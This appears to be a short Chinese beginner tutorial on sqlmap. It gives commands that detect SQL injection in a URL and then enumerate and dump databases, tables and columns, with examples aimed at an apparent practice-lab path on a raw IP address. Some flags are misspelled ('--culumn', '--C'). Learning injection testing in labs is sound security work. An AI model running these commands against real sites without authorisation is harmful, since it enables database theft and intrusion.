sqlmap是一個很好的sql注入工具,操作簡單,容易上手
sqlmap -u url //查看目標url是否存在sql注入漏洞
sqlmap -u url --dbs //如果存在,爆破數據庫
sqlmap -u url -D 數據庫名 --tables //爆破錶名
sqlmap -u url -D 數據庫名 -T 表名 --culumn //爆破列名
sqlmap -u url -D 數據庫名 -T 表名 --C 列名1,列名2 //查詢信息
命令說明
sqlmap -u 目標url
當使用-u參數時,有前提條件。網頁必須是get請求,初學者可理解爲 網頁後面有個問號
例如此url:http://45.32.81.200/vul/sqli/sqli_str.php
此url尾部無問號,因此不能用 -u 參數
但是,如果此時url爲 http://45.32.81.200/vul/sqli/sqli_str.php?name=1 就可以使用了
特別注意 當url的問號後面有兩個參數,需在url加雙引號
例如此url http://45.32.81.200/vul/sqli/sqli_str.php?name=1&sex=2
就該這樣使用: sqlmap -u "目標url"
sqlmap -u "http://45.32.81.200/vul/sqli/sqli_str.php?name=1&sex=2"